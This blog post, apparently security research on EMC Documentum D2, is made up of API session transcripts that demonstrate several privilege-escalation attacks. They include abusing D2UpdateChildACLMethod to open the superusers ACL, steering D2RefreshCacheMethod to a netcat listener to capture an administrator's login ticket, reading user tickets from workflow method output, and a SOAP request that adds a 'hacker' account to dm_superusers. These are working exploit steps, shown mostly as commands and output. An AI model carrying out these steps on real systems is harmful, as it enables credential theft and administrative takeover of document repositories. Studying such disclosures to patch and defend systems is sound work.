Second dive into D2 security

Read previous one.

D2UpdateChildACLMethod

API> retrieve,c,dm_acl where object_name='dm_acl_superusers'
...
45022483800001bc
API> dump,c,45022483800001bc
...
USER ATTRIBUTES

  object_name                     : dm_acl_superusers
  description                     : ACL of superusers used for Docbase Administration
  owner_name                      : d2
  globally_managed                : F
  acl_class                       : 0

SYSTEM ATTRIBUTES

  r_is_internal                   : F
  r_accessor_name              [0]: dm_world
                               [1]: dm_owner
                               [2]: admingroup
  r_accessor_permit            [0]: 1
                               [1]: 7
                               [2]: 7
  r_accessor_xpermit           [0]: 0
                               [1]: 0
                               [2]: 0
  r_is_group                   [0]: F
                               [1]: F
                               [2]: T
  r_has_events                    : F
  r_permit_type                [0]: 0
                               [1]: 0
                               [2]: 0
  r_application_permit         [0]:
                               [1]:
                               [2]:
  r_template_id                   : 0000000000000000
  r_alias_set_id                  : 0000000000000000
  r_object_id                     : 45022483800001bc

APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES

  i_has_required_groups           : F
  i_has_required_group_set        : F
  i_has_access_restrictions       : F
  i_partition                     : 0
  i_is_replica                    : F
  i_vstamp                        : 0

API> retrieve,c,dm_method where object_name='dm_GroupRename'
...
[DM_API_E_NO_MATCH]error:  
   "There was no match in the docbase for the qualification: 
      dm_method where object_name='dm_GroupRename'"

API> create,c,d2_acl_config
...
000224838000012b
API> set,c,l,object_name
SET> ACL of superusers used for Docbase Administration
...
OK
API> append,c,l,accessor_name
SET> dm_world
...
OK
API> append,c,l,condition_attr_name
SET>
...
OK
API> append,c,l,condition_attr_value
SET>
...
OK
API> append,c,l,accessor_permit
SET> 7
...
OK
API> append,c,l,accessor_xpermit
SET> 0
...
OK
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,D2UpdateChildACLMethod,
     ARGUMENTS,S,'
       -docbase_name d2 
       -password "" 
       -acl_config_name "ACL of superusers used for Docbase Administration"
     '
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> close,c,q0
...
OK
API> retrieve,c,dm_method where object_name='dm_GroupRename'
...
100224838000056e
API> get,c,l,_permit
...
7

D2RefreshCacheMethod

nc:

nc -l 7777

api:

API> create,c,d2_options
...
000224838000012c
API> append,c,l,client_urls
SET> http://localhost:7777/
...
OK
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,D2RefreshCacheMethod,
     ARGUMENTS,S,'-docbase_name d2 -password "" -all true',SAVE_RESULTS,B,T
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 0902248380002c87
  result_doc_id                   : 0902248380002c87
  process_id                      : 0
  launch_failed                   : F
  method_return_val               : 0
  os_system_error                 : No Error
  timed_out                       : F
  time_out_length                 : 100
  app_server_host_name            : test
  app_server_port                 : 9080
  app_server_uri                  : /DmMethods/servlet/DoMethod
  error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> getpath,c,0902248380002c87
...
/u01/documentum/cs/data/d2/content_storage_01/00022483/80/00/0a/b6.txt
API> quit
Bye
 ~]$ cat content_storage_01/00022483/80/00/0a/b6.txt
==== START ======================================================================
...............
Refresh cache URL http://localhost:7777/servlet/..._password=DM_TICKET%3DT0...

nc:

GET /servlet/RefreshCache?_docbase=d2&_username=dmadmin&_password=DM_TICKET%3DT0... HTTP/1.1
User-Agent: Java/1.7.0_51
Host: localhost:7777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

D2WF{LaunchScheduledWorkflows, LifeCycle, ReceiveTaskMail, SendTaskMail}Method

If we execute method with SAVE_RESULTS=T we can get user ticket:

==== START =======================================================
D2-API v4.2.0010 build 378
DFC version : 7.1.0020.0120
file.encoding : UTF-8
Arguments : ...
User  : d2_mail_manager
Domain  :
User password : DM_TICKET=T0JKIE5VTEwgMAoxMwp2ZXJzaW9u...
New session manager creation.
Session manager set identity.
Session manager get session.
Tasks found : 0
==== END (0.166s) ================================================

D2FS

api:

API> retrieve,c,dm_user where user_name='hacker'
...
1102248380000541
API> retrieve,c,d2_options
...
000224838000012c
API> dump,c,l
...
USER ATTRIBUTES

  config_security_group           :
  client_security_group           :
  node_admin_security_group       : admingroup
  forbidden_copy                []: <none>
  client_urls                   []: <none>
  enable_compare                  : F
  attribute_list_display_mode     : 0
  node_user_security_group        : admingroup
  node_group_security_group       : admingroup
  node_group_user_parent          : node_admin
  node_group_display_all          : T
  dfc_validator                   : T
  in_create_config              []: <none>
  url_allowed_actions           []: <none>
  lock_config                     : F

SYSTEM ATTRIBUTES

  r_object_id                     : 000224838000012c

APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES

  i_is_replica                    : F
  i_vstamp                        : 2

API> set,c,l,node_user_security_group
SET>
...
OK
API>
save,c,l
...
OK

soap:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
           xmlns:con="http://www.emc.com/d2fs/services/content_service"
           xmlns:com="http://www.emc.com/d2fs/models/common"
           xmlns:prop="http://www.emc.com/d2fs/services/property_service" 
           xmlns:att="http://www.emc.com/d2fs/models/attribute"
           xmlns:con1="http://www.emc.com/d2fs/models/context">
   <soapenv:Header/>
   <soapenv:Body>
      <prop:savePropertiesRequest com:id="1102248380000541" >
         <con1:context uid="2" login="hacker" password="hacker">
                <con1:repository com:id="2" repositoryName="d2" serverVersion="7"
                                 repositoryType="DOCUMENTUM" hideDomain="true"/>
            </con1:context>
         <!--Zero or more repetitions:-->
         <att:attributes name="list" type="2" value="group_membership" />
         <att:attributes name="user_group_name" type="2" value="dm_superusers" />
      </prop:savePropertiesRequest>
   </soapenv:Body>
</soapenv:Envelope>

api:

API> retrieve,c,dm_group where group_name='dm_superusers'
...
1202248380000101
API> dump,c,l
...
USER ATTRIBUTES

  group_name                      : dm_superusers
  group_address                   :
  users_names                  [0]: hacker
  groups_names                 [0]: dm_superusers_dynamic
                               [1]: dcs_privileged_users
  owner_name                      : d2
  is_private                      : F
  description                     :
  globally_managed                : F
  alias_set_id                    : 0000000000000000
  group_source                    :
  group_class                     : privilege group
  group_admin                     :
  is_dynamic                      : F
  is_dynamic_default              : F
  group_global_unique_id          : d2:dm_superusers
  group_native_room_id            : 0000000000000000
  group_directory_id              : 0000000000000000
  group_display_name              : dm_superusers
  is_protected                    : F
  is_module_only                  : F

SYSTEM ATTRIBUTES

  r_modify_date                   : 4/19/2014 22:54:42
  r_has_events                    : F
  r_object_id                     : 1202248380000101

APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES

  i_all_users_names            [0]: hacker
  i_supergroups_names          [0]: dm_superusers
  i_nondyn_supergroups_names   [0]: dm_superusers
  i_is_replica                    : F
  i_vstamp                        : 4

One thought on “Second dive into D2 security

  1. Pingback: CVE-2015-0518. Was it really fixed? | Documentum in a (nuts)HELL

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s